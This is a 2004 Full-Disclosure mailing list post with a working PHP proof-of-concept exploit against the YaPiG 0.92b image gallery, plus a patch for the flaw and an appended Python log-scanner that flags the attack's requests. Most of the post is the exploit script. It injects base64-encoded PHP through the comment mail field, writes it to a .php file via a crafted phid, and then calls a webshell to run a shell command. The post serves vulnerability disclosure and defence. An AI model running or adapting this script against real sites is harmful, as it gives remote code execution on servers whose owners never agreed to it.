Full Disclosure mailing list archives
YaPiG 0.92b add_coment PHP Insertion Proof of Concept
From: "acidbits ." <acidbits () hotmail com>
Date: Tue, 17 Aug 2004 16:18:18 +0000
#!/usr/bin/php
<?
/*
YaPiG 0.92b add_coment PHP Insertion Proof of Concept
By aCiDBiTS acidbits () hotmail com 07-August-2004

Description:
YaPiG (http://yapig.sourceforge.net/) is a PHP Image Gallery script.
This Proof of Concept creates a php file that echoes a notice.
First it determines a valid photo directory where to create the script.
Then creates a crafted comment saved in a new .php file. This comment
contains an encoded webshell. Once this .php file is opened, the code
contained creates test.php.

Usage (in my debian box):
php4 -q yapig_addc_poc.php "http://127.0.0.1/yapig-0.92b"

Vulnerability:
There is no user input sanitization of some parameters in add_comment.php
and functions.php. This allows creating a file with any extension, and we
can insert any code in it.
Version 0.92b is vulnerable, I haven't tested older ones.

Workaround. Modify these lines of code:

add_comment.php line 105:
$comments_file= $gid_dir . $gid . "_" . $phid;
Modify with:
$comments_file= $gid_dir . $gid . "_" . intval($phid);

functions.php, construct_comment_line() line 699-700:
$linea=$linea . $data_array['mail'] . $SEPARATOR;
$linea=$linea . $data_array['web'] . $SEPARATOR;
Modify with:
$linea=$linea . htmlspecialchars($data_array['mail']) . $SEPARATOR;
$linea=$linea . htmlspecialchars($data_array['web']) . $SEPARATOR;
*/

echo "+-------------------------------------------------------+\n| YaPiG 0.92b add_coment PHP Insertion Proof of Concept |\n| By aCiDBiTS acidbits () hotmail com 07-August-2004 |\n+-------------------------------------------------------+\n\n";

$websh="<?php \$f=fopen(trim(base64_decode(dGVzdC5waHAg)),w);fputs(\$f,trim(base64_decode(PD8gZWNobyAnPHByZT4gXCAgLyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXCAgLzxicj4gKE9vKSAgVGhpcyBnYWxsZXJ5IGlzIHZ1bG5lcmFibGUgISAgKG9PKTxicj4vL3x8XFxcXCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8vfHxcXFxcIDwvcHJlPic7Pz4K)));fclose(\$f); ?>";

if($argc<2) die("Usage: ".$argv[0]." URL_to_YaPiG_script\n\n");
$host=$argv[1];
if(substr($host,strlen($host)-1,1)!='/') $host.='/';

echo "[+] Getting valid gid & photo path ... ";
$webc=get_web($host);
$temp=explode(";gid=",$webc);
$gid=intval($temp[1]);
$temp=explode("photos/",$webc);
$temp=explode("/",$temp[1]);
$path=$temp[0];
if( !$gid || !$path ) die( "Failed!\n\n");
echo "OK\n GID: $gid\n Path: ".$host."photos/".$path."/\n\n";

echo "[+] Creating notice script file ... ";
send_post( $host."add_comment.php?gid=".$gid."&phid=.php", "tit=a&aut=a&mail=".urlencode($websh)."&web=&msg=a&date=&send=Send");
$webc=get_web( $host."photos/".$path."/".$gid."_.php" );
send_post( $host."photos/".$path."/acidwebshell.php", "c=".urlencode("rm ".$gid."_.php") );
echo "OK\n Now go to: ".$host."photos/".$path."/test.php";
die("\n\n \ / \ /\n (Oo) Done! (oO)\n //||\\\\ //||\\\\\n\n");

function get_web($url) {
 $ch=curl_init();
 curl_setopt ($ch, CURLOPT_URL, $url);
 curl_setopt ($ch, CURLOPT_HEADER, 0);
 curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
 $data=curl_exec ($ch);
 curl_close ($ch);
 return $data;
}

function send_post($url,$data) {
 $ch=curl_init();
 curl_setopt ($ch, CURLOPT_URL, $url );
 curl_setopt ($ch, CURLOPT_HEADER, 0);
 curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
 curl_setopt ($ch, CURLOPT_POST, 1);
 curl_setopt ($ch, CURLOPT_POSTFIELDS, $data );
 $data=curl_exec ($ch);
 curl_close ($ch);
 return $data;
}

/*
 \ /
 (Oo)
 //||\\
*/
?>

_________________________________________________________________
Add photos to your messages with MSN 8. Get 2 months FREE*. http://join.msn.com/?page=features/featuredemail
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
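A defender-side detector for the issue the post describes, added here and not part of the original post or of YaPiG: it scans web-server access log lines (constructed samples in Apache combined format, an assumed layout) for add_comment.php requests whose gid or phid is not a plain integer, which is exactly what the intval() workaround enforces, and for comment files named <gid>_<phid> under photos/ that ended up with a .php suffix.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [17/Aug/2004:16:18:18 +0000] "GET /yapig-0.92b/ HTTP/1.0" 200 5120 "-" "curl/7.10"
203.0.113.7 - - [17/Aug/2004:16:18:19 +0000] "POST /yapig-0.92b/add_comment.php?gid=3&phid=.php HTTP/1.0" 200 812 "-" "curl/7.10"
198.51.100.4 - - [17/Aug/2004:16:20:02 +0000] "POST /yapig-0.92b/add_comment.php?gid=3&phid=12 HTTP/1.0" 200 812 "-" "Mozilla/5.0"
203.0.113.7 - - [17/Aug/2004:16:18:20 +0000] "GET /yapig-0.92b/photos/holiday/3_.php HTTP/1.0" 200 233 "-" "curl/7.10"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def is_safe_id(value: str) -> bool:
    """gid/phid are integer identifiers; anything else is hostile input."""
    return value.isdigit()

def find_suspicious(log_text: str) -> list:
    """Return (ip, target, reason) for requests that abuse add_comment.php
    or that fetch a comment file written with an executable extension."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a line in the expected format
        ip, target = m.group("ip"), m.group("target")
        parts = urlsplit(target)
        qs = parse_qs(parts.query, keep_blank_values=True)
        if parts.path.endswith("/add_comment.php"):
            for name in ("gid", "phid"):
                for v in qs.get(name, []):
                    if not is_safe_id(v):
                        hits.append((ip, target, f"non-numeric {name}={v!r}"))
        # Comment files are stored as <gid>_<phid> under photos/<dir>/; a .php
        # suffix there means a comment file was written with a script name.
        elif re.search(r"/photos/[^/]+/\d+_[^/]*\.php$", parts.path):
            hits.append((ip, target, "php file in photo directory"))
    return hits

if __name__ == "__main__":
    for ip, target, reason in find_suspicious(SAMPLE_LOG):
        print(f"{ip} {target} -> {reason}")
```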